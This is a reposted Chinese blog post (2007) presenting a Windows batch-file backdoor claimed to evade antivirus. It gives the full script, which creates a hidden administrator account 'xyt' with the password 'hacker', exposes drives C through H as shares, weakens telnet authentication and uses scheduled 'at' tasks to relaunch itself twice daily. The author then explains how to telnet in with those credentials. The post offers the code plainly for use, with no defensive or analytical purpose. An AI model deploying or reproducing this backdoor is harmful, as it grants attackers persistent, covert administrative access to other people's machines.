帮助

内容读取中…

内容读取中…

首页  |  相册  |  共享  |  群组
搜索

正文

[转载]用批处理写的后门 永不被杀 (2007-05-12 14:31)

[转载]用批处理写的后门 永不被杀

作者:xyt   

代码思路是影子鹰DESERT朋友的,原代码比较麻烦,我做了改进,这个后门优点就是小而且不会被杀,放到SYSTEM32目录下就可以了 ,代码如下:
  @echo off
  @attrib +s + r xyt.bat
  @net user xyt hacker /add
  @net localgroup administrators xyt /add
  @net share c$=c:
  @net share d$=d:
  @net share e$=e:
  @net share f$=f:
  @net share g$=g:
  @net share h$=h:
  @tlntadmn config sec = -ntlm

  @net stop schedule
  @net start Schedule
  @echo at 11:00 c:WINNTSYSTEM32log.bat > c:WINNTSYSTEM32xyt.bat
  @echo at 23:00 c:WINNTSYSTEM32log.bat >> c:WINNTSYSTEM32xyt.bat
  @at 11:05 c:WINNTSYSTEM32xyt.bat
  @at 23:05 c:WINNTSYSTEM32xyt.bat
  @net stop telnet
  @net start telnet
  @exit

  这样就会循环运行我们的程序了,即使被人停下来,过几个小时,又回重新运行,呵呵~~
  运行后TELNET IP上去,用户名为xyt,密码为hacker。

评论 (5) | 阅读 (256)

评论
    内容读取中…
发表评论

你还没有登录,现在登录

个人档案

内容读取中…

博客公告

内容读取中…

博客日历

内容读取中…

文章分类

内容读取中…

文章存档

    内容读取中…

最新发表

    内容读取中…

最新评论

内容读取中…

博主留言

内容读取中…

博主好友

内容读取中…

最新访客

内容读取中…

博客统计

    内容读取中…

友情链接

新闻订阅